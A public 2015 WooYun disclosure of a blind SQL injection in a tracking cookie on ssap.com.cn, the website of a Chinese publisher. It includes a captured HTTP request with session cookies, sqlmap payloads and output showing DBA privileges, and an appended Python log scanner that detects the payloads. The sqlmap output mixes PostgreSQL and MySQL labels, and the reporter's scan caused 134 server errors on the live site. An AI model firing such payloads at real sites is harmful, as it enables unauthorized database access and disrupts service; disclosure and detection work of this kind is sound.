
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0107430

Vulnerability title: Injection on the main site of Social Sciences Academic Press

Related vendor: ssap.com.cn

Vulnerability author: 花心h

Submitted: 2015-04-13 10:10

Fixed: 2015-06-01 17:08

Disclosed: 2015-06-01 17:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-13: Details sent to the vendor, awaiting vendor handling
2015-04-17: Vendor confirmed; details disclosed to the vendor only
2015-04-27: Details disclosed to core white hats and experts in related fields
2015-05-07: Details disclosed to regular white hats
2015-05-17: Details disclosed to intern white hats
2015-06-01: Details disclosed to the public

Brief description:

If there is a gift this time, could it please be a book related to my field rather than one on hypnotism (╯‵□′)╯︵┻━┻

Detailed description:

Boolean-based injection
Looks like the site started returning 502 = =... hopefully that wasn't my scan being too aggressive, really sorry about that
DBA privileges
http://www.ssap.com.cn:80 [59.38.99.24]
======================================================
GET /web/c_0000003100040001/ HTTP/1.1
Host: www.ssap.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.ssap.com.cn/Member/PiShuIntros.aspx
Cookie: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid%3D1908397961-1428759007-http%253A%252F%252Fwww.ssap.com.cn%252F%26ntime%3D1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004; _gat=1; CNZZDATA4317812=cnzz_eid%3D1323314981-1428756685-%26ntime%3D1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d
Type: boolean-based blind
Title: PostgreSQL stacked conditional-error blind queries
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=-9286))); SELECT (CASE WHEN (7761=7761) THEN 7761 ELSE 1/(SELECT 0) END)--; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
Type: AND/OR time-based blind
Title: PostgreSQL AND time-based blind (heavy query)
Payload: ImageV=5945; yunsuo_session_verify=68d8ac2a0dee6c05b98d816cc38c8503; ASP.NET_SessionId=t0hlrfrjzhaq2y454zrgqb45; vjuids=42a140db.14ca8ac448c.0.98bb8744; CNZZDATA5121598=cnzz_eid=1908397961-1428759007-http%3A%2F%2Fwww.ssap.com.cn%2F%26ntime=1428759007; vjlast=1428759004.1428759004.30; _ga=GA1.3.1236416063.1428759004; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004))) AND 8326=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND (((3756=3756; _gat=1; CNZZDATA4317812=cnzz_eid=1323314981-1428756685-%26ntime=1428762470; Hm_lpvt_2f5d629cca4db8ee0ecc11e43981f26d=1428762476
---
[11:26:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[11:26:44] [INFO] testing if current user is DBA
[11:26:44] [INFO] fetching current user
[11:26:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:26:44] [INFO] retrieved:
[11:27:20] [INFO] retrieved:
[11:27:20] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:27:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: True
[11:27:21] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 134 times
[11:27:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.ssap.com.cn'
[*] shutting down at 11:27:21
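
As an added example from the defender's side (not part of the report above), the following Python scans constructed access-log lines for the two payload shapes sqlmap reported in the Hm_lvt_... cookie: the stacked conditional-error probe and the GENERATE_SERIES heavy-query time probe. The log line format, the signature set, the cookie splitting rule and the sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Signatures derived from the two sqlmap payloads in the report above: a stacked
# conditional-error probe ("))); SELECT (CASE WHEN ... ELSE 1/(SELECT 0) END)--")
# and a heavy-query time probe ("))) AND n=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))").
SIGNATURES = {
    "stacked-conditional-error": re.compile(r"\)*\s*;\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "heavy-query-time-based": re.compile(r"\bGENERATE_SERIES\s*\(\s*\d+\s*,\s*\d{5,}\s*\)", re.I),
    "boolean-and-subselect": re.compile(r"\)+\s*AND\s+\d+\s*=\s*\(\s*SELECT\b", re.I),
    "sql-comment-terminator": re.compile(r"--\s*(;|$)"),
}

# Split a Cookie header only at a ";" that is followed by "name=", so a ";"
# inside an injected value (as in the stacked payload) does not break the value.
COOKIE_SPLIT = re.compile(r";\s*(?=[A-Za-z_][\w.\-]*=)")

def suspicious_cookies(cookie_header):
    """Map cookie name -> list of matched signatures for values that look like SQL probes."""
    hits = {}
    for pair in COOKIE_SPLIT.split(cookie_header):
        name, sep, value = pair.strip().partition("=")
        if not sep:
            continue
        value = unquote(value)  # cookie values are often URL-encoded in transit
        matched = [sig for sig, pat in SIGNATURES.items() if pat.search(value)]
        if matched:
            hits[name] = matched
    return hits

# Constructed access-log lines (assumed format, not taken from the report): one benign
# request, then the two payload shapes from the sqlmap output, carried in the same cookie.
LOG_LINE = re.compile(r'^(?P<ip>\S+) "(?P<req>[^"]*)" (?P<status>\d{3}) cookie="(?P<cookie>.*)"$')
SAMPLE_LOG = [
    '203.0.113.5 "GET /web/c_0000003100040001/ HTTP/1.1" 200 cookie="ImageV=5945; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004; _gat=1"',
    '203.0.113.5 "GET /web/c_0000003100040001/ HTTP/1.1" 502 cookie="ImageV=5945; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=-9286))); SELECT (CASE WHEN (7761=7761) THEN 7761 ELSE 1/(SELECT 0) END)--; _gat=1"',
    '203.0.113.5 "GET /web/c_0000003100040001/ HTTP/1.1" 200 cookie="ImageV=5945; Hm_lvt_2f5d629cca4db8ee0ecc11e43981f26d=1428759004))) AND 8326=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND (((3756=3756; _gat=1"',
]

def scan_log(lines):
    """Return one (ip, request, cookie_name, signatures) tuple per flagged request."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, sigs in suspicious_cookies(m["cookie"]).items():
            alerts.append((m["ip"], m["req"], name, sigs))
    return alerts
```

Running scan_log(SAMPLE_LOG) flags the second and third lines on the Hm_lvt cookie and leaves the benign first line alone; in a real deployment the signatures belong in a WAF or log-pipeline rule keyed on cookie values, since this report shows that cookies reach the database just like query parameters do.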

Proof of vulnerability:


Fix recommendation:

Copyright notice: when reposting, please credit the source: 花心h@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-17 17:06

Vendor reply:

Many thanks

Latest status:

None yet